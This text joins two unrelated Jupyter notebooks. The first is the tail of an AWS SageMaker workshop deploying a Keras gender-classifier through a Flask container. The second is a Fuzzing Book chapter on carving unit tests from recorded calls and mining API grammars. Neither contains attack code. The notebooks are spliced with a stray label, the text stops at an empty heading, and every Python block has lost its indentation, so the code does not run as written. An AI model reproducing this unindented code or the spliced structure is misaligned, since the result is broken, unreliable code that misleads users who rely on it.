result[name] = 'M' if predictions[i][0]>predictions[i][1] else 'F'
print("{} ({})".format(inputs_list[i],"M" if predictions[i][0]>predictions[i][1] else "F"))
return json.dumps(result)
```
With the prediction code captured, we move on to define the flask app, and provide a `ping`, which SageMaker uses to conduct health check on container instances that are responsible behind the hosted prediction endpoint.<p>
Here we can have the container return healthy response, with status code `200` when everythings goes well.<p>
For simplicity, we are only validating whether model has been loaded in this case. In practice, this provides opportunity extensive health check (including any external dependency check), as required.
```
%%writefile -a byoa/predictor.py
# The flask app for serving predictions
app = flask.Flask(__name__)
@app.route('/ping', methods=['GET'])
def ping():
#Determine if the container is working and healthy.
# Declare it healthy if we can load the model successfully.
health = ScoringService.get_model() is not None and ScoringService.get_indices() is not None
status = 200 if health else 404
return flask.Response(response='\n', status=status, mimetype='application/json')
```
Last but not the least, we define a `transformation` method that would intercept the HTTP request coming through to the SageMaker hosted endpoint.<p>
Here we have the opportunity to decide what type of data we accept with the request. In this particular example, we are accepting only `CSV` formatted data, decoding the data, and invoking prediction.<p>
The response is similarly funneled backed to the caller with MIME type of `CSV`.<p>
You are free to choose any or multiple MIME types for your requests and response. However if you choose to do so, it is within this method that we have to transform the back to and from the format that is suitable to passed for prediction.
```
%%writefile -a byoa/predictor.py
@app.route('/invocations', methods=['POST'])
def transformation():
#Do an inference on a single batch of data
data = None
# Convert from CSV to pandas
if flask.request.content_type == 'text/csv':
data = flask.request.data.decode('utf-8')
else:
return flask.Response(response='This predictor only supports CSV data', status=415, mimetype='text/plain')
print('Invoked with {} records'.format(data.count(",")+1))
# Do the prediction
predictions = ScoringService.predict(data)
result = ""
for prediction in predictions:
result = result + prediction
return flask.Response(response=result, status=200, mimetype='text/csv')
```
Note that in containerizing our custom LSTM Algorithm, where we used `Keras` as our framework of our choice, we did not have to interact directly with the SageMaker API, even though SageMaker API doesn't support `Keras`.<p>
This serves to show the power and flexibility offered by containerized machine learning pipeline on SageMaker.
## Container publishing
In order to host and deploy the trained model using SageMaker, we need to build the `Docker` containers, publish it to `Amazon ECR` repository, and then either use SageMaker console or API to created the endpoint configuration and deploy the stages.<p>
Conceptually, the steps required for publishing are:<p>
1. Make the`predictor.py` files executable
2. Create an ECR repository within your default region
3. Build a docker container with an identifieable name
4. Tage the image and publish to the ECR repository
<p><br>
All of these are conveniently encapsulated inside `build_and_push` script. We simply run it with the unique name of our production run.
```
run_type='cpu'
instance_class = "p3" if run_type.lower()=='gpu' else "c4"
instance_type = "ml.{}.8xlarge".format(instance_class)
pipeline_name = 'gender-classifier'
run=input("Enter run version: ")
run_name = pipeline_name+"-"+run
if run_type == "cpu":
!cp "Dockerfile.cpu" "Dockerfile"
if run_type == "gpu":
!cp "Dockerfile.gpu" "Dockerfile"
!sh build_and_push.sh $run_name
```
## Orchestration
At this point, we can head to ECS console, grab the ARN for the repository where we published the docker image, and use SageMaker console to create hosted model, and endpoint.<p>
However, it is often more convenient to automate these steps. In this notebook we do exactly that using `boto3 SageMaker` API.<p>
Following are the steps:<p>
* First we create a model hosting definition, by providing the S3 location to the model artifact, and ARN to the ECR image of the container.
* Using the model hosting definition, our next step is to create configuration of a hosted endpoint that will be used to serve prediciton generation requests.
* Creating the endpoint is the last step in the ML cycle, that prepares your model to serve client reqests from applications.
* We wait until the provision is completed and the endpoint in service. At this point we can send request to this endpoint and obtain gender predictions.
```
import sagemaker
sm_role = sagemaker.get_execution_role()
print("Using Role {}".format(sm_role))
acc = boto3.client('sts').get_caller_identity().get('Account')
reg = boto3.session.Session().region_name
sagemaker = boto3.client('sagemaker')
#Check if model already exists
model_name = "{}-model".format(run_name)
models = sagemaker.list_models(NameContains=model_name)['Models']
model_exists = False
if len(models) > 0:
for model in models:
if model['ModelName'] == model_name:
model_exists = True
break
#Delete model, if chosen
if model_exists == True:
choice = input("Model already exists, do you want to delete and create a fresh one (Y/N) ? ")
if choice.upper()[0:1] == "Y":
sagemaker.delete_model(ModelName = model_name)
model_exists = False
else:
print("Model - {} already exists".format(model_name))
if model_exists == False:
model_response = sagemaker.create_model(
ModelName=model_name,
PrimaryContainer={
'Image': '{}.dkr.ecr.{}.amazonaws.com/{}:latest'.format(acc, reg, run_name),
'ModelDataUrl': 's3://{}/model/model.tar.gz'.format(s3bucketname)
},
ExecutionRoleArn=sm_role,
Tags=[
{
'Key': 'Name',
'Value': model_name
}
]
)
print("{} Created at {}".format(model_response['ModelArn'],
model_response['ResponseMetadata']['HTTPHeaders']['date']))
#Check if endpoint configuration already exists
endpoint_config_name = "{}-endpoint-config".format(run_name)
endpoint_configs = sagemaker.list_endpoint_configs(NameContains=endpoint_config_name)['EndpointConfigs']
endpoint_config_exists = False
if len(endpoint_configs) > 0:
for endpoint_config in endpoint_configs:
if endpoint_config['EndpointConfigName'] == endpoint_config_name:
endpoint_config_exists = True
break
#Delete endpoint configuration, if chosen
if endpoint_config_exists == True:
choice = input("Endpoint Configuration already exists, do you want to delete and create a fresh one (Y/N) ? ")
if choice.upper()[0:1] == "Y":
sagemaker.delete_endpoint_config(EndpointConfigName = endpoint_config_name)
endpoint_config_exists = False
else:
print("Endpoint Configuration - {} already exists".format(endpoint_config_name))
if endpoint_config_exists == False:
endpoint_config_response = sagemaker.create_endpoint_config(
EndpointConfigName=endpoint_config_name,
ProductionVariants=[
{
'VariantName': 'default',
'ModelName': model_name,
'InitialInstanceCount': 1,
'InstanceType': instance_type,
'InitialVariantWeight': 1
},
],
Tags=[
{
'Key': 'Name',
'Value': endpoint_config_name
}
]
)
print("{} Created at {}".format(endpoint_config_response['EndpointConfigArn'],
endpoint_config_response['ResponseMetadata']['HTTPHeaders']['date']))
from ipywidgets import widgets
from IPython.display import display
#Check if endpoint already exists
endpoint_name = "{}-endpoint".format(run_name)
endpoints = sagemaker.list_endpoints(NameContains=endpoint_name)['Endpoints']
endpoint_exists = False
if len(endpoints) > 0:
for endpoint in endpoints:
if endpoint['EndpointName'] == endpoint_name:
endpoint_exists = True
break
#Delete endpoint, if chosen
if endpoint_exists == True:
choice = input("Endpoint already exists, do you want to delete and create a fresh one (Y/N) ? ")
if choice.upper()[0:1] == "Y":
sagemaker.delete_endpoint(EndpointName = endpoint_name)
print("Deleting Endpoint - {} ...".format(endpoint_name))
waiter = sagemaker.get_waiter('endpoint_deleted')
waiter.wait(EndpointName=endpoint_name,
WaiterConfig = {'Delay':1,'MaxAttempts':100})
endpoint_exists = False
print("Endpoint - {} deleted".format(endpoint_name))
else:
print("Endpoint - {} already exists".format(endpoint_name))
if endpoint_exists == False:
endpoint_response = sagemaker.create_endpoint(
EndpointName=endpoint_name,
EndpointConfigName=endpoint_config_name,
Tags=[
{
'Key': 'string',
'Value': endpoint_name
}
]
)
status='Creating'
sleep = 3
print("{} Endpoint : {}".format(status,endpoint_name))
bar = widgets.FloatProgress(min=0, description="Progress") # instantiate the bar
display(bar) # display the bar
while status != 'InService' and status != 'Failed' and status != 'OutOfService':
endpoint_response = sagemaker.describe_endpoint(
EndpointName=endpoint_name
)
status = endpoint_response['EndpointStatus']
time.sleep(sleep)
bar.value = bar.value + 1
if bar.value >= bar.max-1:
bar.max = int(bar.max*1.05)
if status != 'InService' and status != 'Failed' and status != 'OutOfService':
print(".", end='')
bar.max = bar.value
html = widgets.HTML(
value="<H2>Endpoint <b><u>{}</b></u> - {}</H2>".format(endpoint_response['EndpointName'], status)
)
display(html)
```
At the end we run a quick test to validate we are able to generate meaningful predicitions using the hosted endpoint, as we did locally using the model on the Notebbok instance.
```
!aws sagemaker-runtime invoke-endpoint --endpoint-name "$run_name-endpoint" --body 'Tom,Allie,Jim,Sophie,John,Kayla,Mike,Amanda,Andrew' --content-type text/csv outfile
!cat outfile
```
Head back to Module-3 of the workshop now, to the section titled - `Integration`, and follow the steps described.<p>
You'll need to copy the endpoint name from the output of the cell below, to use in the Lambda function that will send request to this hosted endpoint.
```
print(endpoint_response
['EndpointName'])
```
|
github_jupyter
|
# Carving Unit Tests
So far, we have always generated _system input_, i.e. data that the program as a whole obtains via its input channels. If we are interested in testing only a small set of functions, having to go through the system can be very inefficient. This chapter introduces a technique known as _carving_, which, given a system test, automatically extracts a set of _unit tests_ that replicate the calls seen during the unit test. The key idea is to _record_ such calls such that we can _replay_ them later – as a whole or selectively. On top, we also explore how to synthesize API grammars from carved unit tests; this means that we can _synthesize API tests without having to write a grammar at all._
**Prerequisites**
* Carving makes use of dynamic traces of function calls and variables, as introduced in the [chapter on configuration fuzzing](ConfigurationFuzzer.ipynb).
* Using grammars to test units was introduced in the [chapter on API fuzzing](APIFuzzer.ipynb).
```
import bookutils
import APIFuzzer
```
## Synopsis
<!-- Automatically generated. Do not edit. -->
To [use the code provided in this chapter](Importing.ipynb), write
```python
>>> from fuzzingbook.Carver import <identifier>
```
and then make use of the following features.
This chapter provides means to _record and replay function calls_ during a system test. Since individual function calls are much faster than a whole system run, such "carving" mechanisms have the potential to run tests much faster.
### Recording Calls
The `CallCarver` class records all calls occurring while it is active. It is used in conjunction with a `with` clause:
```python
>>> with CallCarver() as carver:
>>> y = my_sqrt(2)
>>> y = my_sqrt(4)
```
After execution, `called_functions()` lists the names of functions encountered:
```python
>>> carver.called_functions()
['my_sqrt', '__exit__']
```
The `arguments()` method lists the arguments recorded for a function. This is a mapping of the function name to a list of lists of arguments; each argument is a pair (parameter name, value).
```python
>>> carver.arguments('my_sqrt')
[[('x', 2)], [('x', 4)]]
```
Complex arguments are properly serialized, such that they can be easily restored.
### Synthesizing Calls
While such recorded arguments already could be turned into arguments and calls, a much nicer alternative is to create a _grammar_ for recorded calls. This allows to synthesize arbitrary _combinations_ of arguments, and also offers a base for further customization of calls.
The `CallGrammarMiner` class turns a list of carved executions into a grammar.
```python
>>> my_sqrt_miner = CallGrammarMiner(carver)
>>> my_sqrt_grammar = my_sqrt_miner.mine_call_grammar()
>>> my_sqrt_grammar
{'<start>': ['<call>'],
'<call>': ['<my_sqrt>'],
'<my_sqrt-x>': ['2', '4'],
'<my_sqrt>': ['my_sqrt(<my_sqrt-x>)']}
```
This grammar can be used to synthesize calls.
```python
>>> fuzzer = GrammarCoverageFuzzer(my_sqrt_grammar)
>>> fuzzer.fuzz()
'my_sqrt(4)'
```
These calls can be executed in isolation, effectively extracting unit tests from system tests:
```python
>>> eval(fuzzer.fuzz())
1.414213562373095
```
## System Tests vs Unit Tests
Remember the URL grammar introduced for [grammar fuzzing](Grammars.ipynb)? With such a grammar, we can happily test a Web browser again and again, checking how it reacts to arbitrary page requests.
Let us define a very simple "web browser" that goes and downloads the content given by the URL.
```
import urllib.parse
def webbrowser(url):
"""Download the http/https resource given by the URL"""
import requests # Only import if needed
r = requests.get(url)
return r.text
```
Let us apply this on [fuzzingbook.org](https://www.fuzzingbook.org/) and measure the time, using the [Timer class](Timer.ipynb):
```
from Timer import Timer
with Timer() as webbrowser_timer:
fuzzingbook_contents = webbrowser(
"http://www.fuzzingbook.org/html/Fuzzer.html")
print("Downloaded %d bytes in %.2f seconds" %
(len(fuzzingbook_contents), webbrowser_timer.elapsed_time()))
fuzzingbook_contents[:100]
```
A full webbrowser, of course, would also render the HTML content. We can achieve this using these commands (but we don't, as we do not want to replicate the entire Web page here):
```python
from IPython.display import HTML, display
HTML(fuzzingbook_contents)
```
Having to start a whole browser (or having it render a Web page) again and again means lots of overhead, though – in particular if we want to test only a subset of its functionality. In particular, after a change in the code, we would prefer to test only the subset of functions that is affected by the change, rather than running the well-tested functions again and again.
Let us assume we change the function that takes care of parsing the given URL and decomposing it into the individual elements – the scheme ("http"), the network location (`"www.fuzzingbook.com"`), or the path (`"/html/Fuzzer.html"`). This function is named `urlparse()`:
```
from urllib.parse import urlparse
urlparse('https://www.fuzzingbook.com/html/Carver.html')
```
You see how the individual elements of the URL – the _scheme_ (`"http"`), the _network location_ (`"www.fuzzingbook.com"`), or the path (`"//html/Carver.html"`) are all properly identified. Other elements (like `params`, `query`, or `fragment`) are empty, because they were not part of our input.
The interesting thing is that executing only `urlparse()` is orders of magnitude faster than running all of `webbrowser()`. Let us measure the factor:
```
runs = 1000
with Timer() as urlparse_timer:
for i in range(runs):
urlparse('https://www.fuzzingbook.com/html/Carver.html')
avg_urlparse_time = urlparse_timer.elapsed_time() / 1000
avg_urlparse_time
```
Compare this to the time required by the webbrowser
```
webbrowser_timer.elapsed_time()
```
The difference in time is huge:
```
webbrowser_timer.elapsed_time() / avg_urlparse_time
```
Hence, in the time it takes to run `webbrowser()` once, we can have _tens of thousands_ of executions of `urlparse()` – and this does not even take into account the time it takes the browser to render the downloaded HTML, to run the included scripts, and whatever else happens when a Web page is loaded. Hence, strategies that allow us to test at the _unit_ level are very promising as they can save lots of overhead.
## Carving Unit Tests
Testing methods and functions at the unit level requires a very good understanding of the individual units to be tested as well as their interplay with other units. Setting up an appropriate infrastructure and writing unit tests by hand thus is demanding, yet rewarding. There is, however, an interesting alternative to writing unit tests by hand. The technique of _carving_ automatically _converts system tests into unit tests_ by means of recording and replaying function calls:
1. During a system test (given or generated), we _record_ all calls into a function, including all arguments and other variables the function reads.
2. From these, we synthesize a self-contained _unit test_ that reconstructs the function call with all arguments.
3. This unit test can be executed (replayed) at any time with high efficiency.
In the remainder of this chapter, let us explore these steps.
## Recording Calls
Our first challenge is to record function calls together with their arguments. (In the interest of simplicity, we restrict ourself to arguments, ignoring any global variables or other non-arguments that are read by the function.) To record calls and arguments, we use the mechanism [we introduced for coverage](Coverage.ipynb): By setting up a tracer function, we track all calls into individual functions, also saving their arguments. Just like `Coverage` objects, we want to use `Carver` objects to be able to be used in conjunction with the `with` statement, such that we can trace a particular code block:
```python
with Carver() as carver:
function_to_be_traced()
c = carver.calls()
```
The initial definition supports this construct:
\todo{Get tracker from [dynamic invariants](DynamicInvariants.ipynb)}
```
import sys
class Carver(object):
def __init__(self, log=False):
self._log = log
self.reset()
def reset(self):
self._calls = {}
# Start of `with` block
def __enter__(self):
self.original_trace_function = sys.gettrace()
sys.settrace(self.traceit)
return self
# End of `with` block
def __exit__(self, exc_type, exc_value, tb):
sys.settrace(self.original_trace_function)
```
The actual work takes place in the `traceit()` method, which records all calls in the `_calls` attribute. First, we define two helper functions:
```
import inspect
def get_qualified_name(code):
"""Return the fully qualified name of the current function"""
name = code.co_name
module = inspect.getmodule(code)
if module is not None:
name = module.__name__ + "." + name
return name
def get_arguments(frame):
"""Return call arguments in the given frame"""
# When called, all arguments are local variables
arguments = [(var, frame.f_locals[var]) for var in frame.f_locals]
arguments.reverse() # Want same order as call
return arguments
class CallCarver(Carver):
def add_call(self, function_name, arguments):
"""Add given call to list of calls"""
if function_name not in self._calls:
self._calls[function_name] = []
self._calls[function_name].append(arguments)
# Tracking function: Record all calls and all args
def traceit(self, frame, event, arg):
if event != "call":
return None
code = frame.f_code
function_name = code.co_name
qualified_name = get_qualified_name(code)
arguments = get_arguments(frame)
self.add_call(function_name, arguments)
if qualified_name != function_name:
self.add_call(qualified_name, arguments)
if self._log:
print(simple_call_string(function_name, arguments))
return None
```
Finally, we need some convenience functions to access the calls:
```
class CallCarver(CallCarver):
def calls(self):
"""Return a dictionary of all calls traced."""
return self._calls
def arguments(self, function_name):
"""Return a list of all arguments of the given function
as (VAR, VALUE) pairs.
Raises an exception if the function was not traced."""
return self._calls[function_name]
def called_functions(self, qualified=False):
"""Return all functions called."""
if qualified:
return [function_name for function_name in self._calls.keys()
if function_name.find('.') >= 0]
else:
return [function_name for function_name in self._calls.keys()
if function_name.find('.') < 0]
```
### Recording my_sqrt()
Let's try out our new `Carver` class – first on a very simple function:
```
from Intro_Testing import my_sqrt
with CallCarver() as sqrt_carver:
my_sqrt(2)
my_sqrt(4)
```
We can retrieve all calls seen...
```
sqrt_carver.calls()
sqrt_carver.called_functions()
```
... as well as the arguments of a particular function:
```
sqrt_carver.arguments("my_sqrt")
```
We define a convenience function for nicer printing of these lists:
```
def simple_call_string(function_name, argument_list):
"""Return function_name(arg[0], arg[1], ...) as a string"""
return function_name + "(" + \
", ".join([var + "=" + repr(value)
for (var, value) in argument_list]) + ")"
for function_name in sqrt_carver.called_functions():
for argument_list in sqrt_carver.arguments(function_name):
print(simple_call_string(function_name, argument_list))
```
This is a syntax we can directly use to invoke `my_sqrt()` again:
```
eval("my_sqrt(x=2)")
```
### Carving urlparse()
What happens if we apply this to `webbrowser()`?
```
with CallCarver() as webbrowser_carver:
webbrowser("http://www.example.com")
```
We see that retrieving a URL from the Web requires quite some functionality:
```
function_list = webbrowser_carver.called_functions(qualified=True)
len(function_list)
print(function_list[:50])
```
Among several other functions, we also have a call to `urlparse()`:
```
urlparse_argument_list = webbrowser_carver.arguments("urllib.parse.urlparse")
urlparse_argument_list
```
Again, we can convert this into a well-formatted call:
```
urlparse_call = simple_call_string("urlparse", urlparse_argument_list[0])
urlparse_call
```
Again, we can re-execute this call:
```
eval(urlparse_call)
```
We now have successfully carved the call to `urlparse()` out of the `webbrowser()` execution.
## Replaying Calls
Replaying calls in their entirety and in all generality is tricky, as there are several challenges to be addressed. These include:
1. We need to be able to _access_ individual functions. If we access a function by name, the name must be in scope. If the name is not visible (for instance, because it is a name internal to the module), we must make it visible.
2. Any _resources_ accessed outside of arguments must be recorded and reconstructed for replay as well. This can be difficult if variables refer to external resources such as files or network resources.
3. _Complex objects_ must be reconstructed as well.
These constraints make carving hard or even impossible if the function to be tested interacts heavily with its environment. To illustrate these issues, consider the `email.parser.parse()` method that is invoked in `webbrowser()`:
```
email_parse_argument_list = webbrowser_carver.arguments("email.parser.parse")
```
Calls to this method look like this:
```
email_parse_call = simple_call_string(
"email.parser.parse",
email_parse_argument_list[0])
email_parse_call
```
We see that `email.parser.parse()` is part of a `email.parser.Parser` object and it gets a `StringIO` object. Both are non-primitive values. How could we possibly reconstruct them?
### Serializing Objects
The answer to the problem of complex objects lies in creating a _persistent_ representation that can be _reconstructed_ at later points in time. This process is known as _serialization_; in Python, it is also known as _pickling_. The `pickle` module provides means to create a serialized representation of an object. Let us apply this on the `email.parser.Parser` object we just found:
```
import pickle
parser_object = email_parse_argument_list[0][0][1]
parser_object
pickled = pickle.dumps(parser_object)
pickled
```
From this string representing the serialized `email.parser.Parser` object, we can recreate the Parser object at any time:
```
unpickled_parser_object = pickle.loads(pickled)
unpickled_parser_object
```
The serialization mechanism allows us to produce a representation for all objects passed as parameters (assuming they can be pickled, that is). We can now extend the `simple_call_string()` function such that it automatically pickles objects. Additionally, we set it up such that if the first parameter is named `self` (i.e., it is a class method), we make it a method of the `self` object.
```
def call_value(value):
value_as_string = repr(value)
if value_as_string.find('<') >= 0:
# Complex object
value_as_string = "pickle.loads(" + repr(pickle.dumps(value)) + ")"
return value_as_string
def call_string(function_name, argument_list):
"""Return function_name(arg[0], arg[1], ...) as a string, pickling complex objects"""
if len(argument_list) > 0:
(first_var, first_value) = argument_list[0]
if first_var == "self":
# Make this a method call
method_name = function_name.split(".")[-1]
function_name = call_value(first_value) + "." + method_name
argument_list = argument_list[1:]
return function_name + "(" + \
", ".join([var + "=" + call_value(value)
for (var, value) in argument_list]) + ")"
```
Let us apply the extended `call_string()` method to create a call for `email.parser.parse()`, including pickled objects:
```
call = call_string("email.parser.parse", email_parse_argument_list[0])
print(call)
```
With this call involvimng the pickled object, we can now re-run the original call and obtain a valid result:
```
eval(call)
```
### All Calls
So far, we have seen only one call of `webbrowser()`. How many of the calls within `webbrowser()` can we actually carve and replay? Let us try this out and compute the numbers.
```
import traceback
import enum
import socket
all_functions = set(webbrowser_carver.called_functions(qualified=True))
call_success = set()
run_success = set()
exceptions_seen = set()
for function_name in webbrowser_carver.called_functions(qualified=True):
for argument_list in webbrowser_carver.arguments(function_name):
try:
call = call_string(function_name, argument_list)
call_success.add(function_name)
result = eval(call)
run_success.add(function_name)
except Exception as exc:
exceptions_seen.add(repr(exc))
# print("->", call, file=sys.stderr)
# traceback.print_exc()
# print("", file=sys.stderr)
continue
print("%d/%d calls (%.2f%%) successfully created and %d/%d calls (%.2f%%) successfully ran" % (
len(call_success), len(all_functions), len(
call_success) * 100 / len(all_functions),
len(run_success), len(all_functions), len(run_success) * 100 / len(all_functions)))
```
About half of the calls succeed. Let us take a look into some of the error messages we get:
```
for i in range(10):
print(list(exceptions_seen)[i])
```
We see that:
* **A large majority of calls could be converted into call strings.** If this is not the case, this is mostly due to having unserialized objects being passed.
* **About half of the calls could be executed.** The error messages for the failing runs are varied; the most frequent being that some internal name is invoked that is not in scope.
Our carving mechanism should be taken with a grain of salt: We still do not cover the situation where external variables and values (such as global variables) are being accessed, and the serialization mechanism cannot recreate external resources. Still, if the function of interest falls among those that _can_ be carved and replayed, we can very effectively re-run its calls with their original arguments.
## Mining API Grammars from Carved Calls
So far, we have used carved calls to replay exactly the same invocations as originally encountered. However, we can also _mutate_ carved calls to effectively fuzz APIs with previously recorded arguments.
The general idea is as follows:
1. First, we record all calls of a specific function from a given execution of the program.
2. Second, we create a grammar that incorporates all these calls, with separate rules for each argument and alternatives for each value found; this allows us to produce calls that arbitrarily _recombine_ these arguments.
Let us explore these steps in the following sections.
### From Calls to Grammars
Let us start with an example. The `power(x, y)` function returns $x^y$; it is but a wrapper around the equivalent `math.pow()` function. (Since `power()` is defined in Python, we can trace it – in contrast to `math.pow()`, which is implemented in C.)
```
import math
def power(x, y):
return math.pow(x, y)
```
Let us invoke `power()` while recording its arguments:
```
with CallCarver() as power_carver:
z = power(1, 2)
z = power(3, 4)
power_carver.arguments("power")
```
From this list of recorded arguments, we could now create a grammar for the `power()` call, with `x` and `y` expanding into the values seen:
```
from Grammars import START_SYMBOL, is_valid_grammar, new_symbol, extend_grammar
POWER_GRAMMAR = {
"<start>": ["power(<x>, <y>)"],
"<x>": ["1", "3"],
"<y>": ["2", "4"]
}
assert is_valid_grammar(POWER_GRAMMAR)
```
When fuzzing with this grammar, we then get arbitrary combinations of `x` and `y`; aiming for coverage will ensure that all values are actually tested at least once:
```
from GrammarCoverageFuzzer import GrammarCoverageFuzzer
power_fuzzer = GrammarCoverageFuzzer(POWER_GRAMMAR)
[power_fuzzer.fuzz() for i in range(5)]
```
What we need is a method to automatically convert the arguments as seen in `power_carver` to the grammar as seen in `POWER_GRAMMAR`. This is what we define in the next section.
### A Grammar Miner for Calls
We introduce a class `CallGrammarMiner`, which, given a `Carver`, automatically produces a grammar from the calls seen. To initialize, we pass the carver object:
```
class CallGrammarMiner(object):
def __init__(self, carver, log=False):
self.carver = carver
self.log = log
```
#### Initial Grammar
The initial grammar produces a single call. The possible `<call>` expansions are to be constructed later:
```
import copy
class CallGrammarMiner(CallGrammarMiner):
CALL_SYMBOL = "<call>"
def initial_grammar(self):
return extend_grammar(
{START_SYMBOL: [self.CALL_SYMBOL],
self.CALL_SYMBOL: []
})
m = CallGrammarMiner(power_carver)
initial_grammar = m.initial_grammar()
initial_grammar
```
#### A Grammar from Arguments
Let us start by creating a grammar from a list of arguments. The method `mine_arguments_grammar()` creates a grammar for the arguments seen during carving, such as these:
```
arguments = power_carver.arguments("power")
arguments
```
The `mine_arguments_grammar()` method iterates through the variables seen and creates a mapping `variables` of variable names to a set of values seen (as strings, going through `call_value()`). In a second step, it then creates a grammar with a rule for each variable name, expanding into the values seen.
```
class CallGrammarMiner(CallGrammarMiner):
def var_symbol(self, function_name, var, grammar):
return new_symbol(grammar, "<" + function_name + "-" + var + ">")
def mine_arguments_grammar(self, function_name, arguments, grammar):
var_grammar = {}
variables = {}
for argument_list in arguments:
for (var, value) in argument_list:
value_string = call_value(value)
if self.log:
print(var, "=", value_string)
if value_string.find("<") >= 0:
var_grammar["<langle>"] = ["<"]
value_string = value_string.replace("<", "<langle>")
if var not in variables:
variables[var] = set()
variables[var].add(value_string)
var_symbols = []
for var in variables:
var_symbol = self.var_symbol(function_name, var, grammar)
var_symbols.append(var_symbol)
var_grammar[var_symbol] = list(variables[var])
return var_grammar, var_symbols
m = CallGrammarMiner(power_carver)
var_grammar, var_symbols = m.mine_arguments_grammar(
"power", arguments, initial_grammar)
var_grammar
```
The additional return value `var_symbols` is a list of argument symbols in the call:
```
var_symbols
```
#### A Grammar from Calls
To get the grammar for a single function (`mine_function_grammar()`), we add a call to the function:
```
class CallGrammarMiner(CallGrammarMiner):
def function_symbol(self, function_name, grammar):
return new_symbol(grammar, "<" + function_name + ">")
def mine_function_grammar(self, function_name, grammar):
arguments = self.carver.arguments(function_name)
if self.log:
print(function_name, arguments)
var_grammar, var_symbols = self.mine_arguments_grammar(
function_name, arguments, grammar)
function_grammar = var_grammar
function_symbol = self.function_symbol(function_name, grammar)
if len(var_symbols) > 0 and var_symbols[0].find("-self") >= 0:
# Method call
function_grammar[function_symbol] = [
var_symbols[0] + "." + function_name + "(" + ", ".join(var_symbols[1:]) + ")"]
else:
function_grammar[function_symbol] = [
function_name + "(" + ", ".join(var_symbols) + ")"]
if self.log:
print(function_symbol, "::=", function_grammar[function_symbol])
return function_grammar, function_symbol
m = CallGrammarMiner(power_carver)
function_grammar, function_symbol = m.mine_function_grammar(
"power", initial_grammar)
function_grammar
```
The additionally returned `function_symbol` holds the name of the function call just added:
```
function_symbol
```
#### A Grammar from all Calls
Let us now repeat the above for all function calls seen during carving. To this end, we simply iterate over all function calls seen:
```
power_carver.called_functions()
class CallGrammarMiner(CallGrammarMiner):
def mine_call_grammar(self, function_list=None, qualified=False):
grammar = self.initial_grammar()
fn_list = function_list
if function_list is None:
fn_list = self.carver.called_functions(qualified=qualified)
for function_name in fn_list:
if function_list is None and (function_name.startswith("_") or function_name.startswith("<")):
continue # Internal function
# Ignore errors with mined functions
try:
function_grammar, function_symbol = self.mine_function_grammar(
function_name, grammar)
except:
if function_list is not None:
raise
if function_symbol not in grammar[self.CALL_SYMBOL]:
grammar[self.CALL_SYMBOL].append(function_symbol)
grammar.update(function_grammar)
assert is_valid_grammar(grammar)
return grammar
```
The method `mine_call_grammar()` is the one that clients can and should use – first for mining...
```
m = CallGrammarMiner(power_carver)
power_grammar = m.mine_call_grammar()
power_grammar
```
...and then for fuzzing:
```
power_fuzzer = GrammarCoverageFuzzer(power_grammar)
[power_fuzzer.fuzz() for i in range(5)]
```
With this, we have successfully extracted a grammar from a recorded execution; in contrast to "simple" carving, our grammar allows us to _recombine_ arguments and thus to fuzz at the API level.
## Fuzzing Web Functions
Let us now apply our grammar miner on a larger API – the `urlparse()` function we already encountered during carving.
```
with CallCarver() as webbrowser_carver:
webbrowser("https://www.fuzzingbook.org")
webbrowser("http://www.example.com")
```
We can mine a grammar from the calls encountered:
```
m = CallGrammarMiner(webbrowser_carver)
webbrowser_grammar = m.mine_call_grammar()
```
This is a rather large grammar:
```
call_list = webbrowser_grammar['<call>']
len(call_list)
print(call_list[:20])
```
Here's the rule for the `urlsplit()` function:
```
webbrowser_grammar["<urlsplit>"]
```
Here are the arguments. Note that although we only passed `http://www.fuzzingbook.org` as a parameter, we also see the `https:` variant. That is because opening the `http:` URL automatically redirects to the `https:` URL, which is then also processed by `urlsplit()`.
```
webbrowser_grammar["<urlsplit-url>"]
```
There also is some variation in the `scheme` argument:
```
webbrowser_grammar["<urlsplit-scheme>"]
```
If we now apply a fuzzer on these rules, we systematically cover all variations of arguments seen, including, of course, combinations not seen during carving. Again, we are fuzzing at the API level here.
```
urlsplit_fuzzer = GrammarCoverageFuzzer(
webbrowser_grammar, start_symbol="<urlsplit>")
for i in range(5):
print(urlsplit_fuzzer.fuzz())
```
Just as seen with carving, running tests at the API level is orders of magnitude faster than executing system tests. Hence, this calls for means to fuzz at the method level:
```
from urllib.parse import urlsplit
from Timer import Timer
with Timer() as urlsplit_timer:
urlsplit('http://www.fuzzingbook.org/', 'http', True)
urlsplit_timer.elapsed_time()
with Timer() as webbrowser_timer:
webbrowser("http://www.fuzzingbook.org")
webbrowser_timer.elapsed_time()
webbrowser_timer.elapsed_time() / urlsplit_timer.elapsed_time()
```
But then again, the caveats encountered during carving apply, notably the requirement to recreate the original function environment. If we also alter or recombine arguments, we get the additional risk of _violating an implicit precondition_ – that is, invoking a function with arguments the function was never designed for. Such _false alarms_, resulting from incorrect invocations rather than incorrect implementations, must then be identified (typically manually) and wed out (for instance, by altering or constraining the grammar). The huge speed gains at the API level, however, may well justify this additional investment.
## Synopsis
This chapter provides means to _record and replay function calls_ during a system test. Since individual function calls are much faster than a whole system run, such "carving" mechanisms have the potential to run tests much faster.
### Recording Calls
The `CallCarver` class records all calls occurring while it is active. It is used in conjunction with a `with` clause:
```
with CallCarver() as carver:
y = my_sqrt(2)
y = my_sqrt(4)
```
After execution, `called_functions()` lists the names of functions encountered:
```
carver.called_functions()
```
The `arguments()` method lists the arguments recorded for a function. This is a mapping of the function name to a list of lists of arguments; each argument is a pair (parameter name, value).
```
carver.arguments('my_sqrt')
```
Complex arguments are properly serialized, such that they can be easily restored.
### Synthesizing Calls
While such recorded arguments already could be turned into arguments and calls, a much nicer alternative is to create a _grammar_ for recorded calls. This allows to synthesize arbitrary _combinations_ of arguments, and also offers a base for further customization of calls.
The `CallGrammarMiner` class turns a list of carved executions into a grammar.
```
my_sqrt_miner = CallGrammarMiner(carver)
my_sqrt_grammar = my_sqrt_miner.mine_call_grammar()
my_sqrt_grammar
```
This grammar can be used to synthesize calls.
```
fuzzer = GrammarCoverageFuzzer(my_sqrt_grammar)
fuzzer.fuzz()
```
These calls can be executed in isolation, effectively extracting unit tests from system tests:
```
eval(fuzzer.fuzz())
```
## Lessons Learned
* _Carving_ allows for effective replay of function calls recorded during a system test.
* A function call can be _orders of magnitude faster_ than a system invocation.
* _Serialization_ allows to create persistent representations of complex objects.
* Functions that heavily interact with their environment and/or access external resources are difficult to carve.
* From carved calls, one can produce API grammars that arbitrarily combine carved arguments.
## Next Steps
In the next chapter, we will discuss [how to reduce failure-inducing inputs](Reducer.ipynb).
## Background
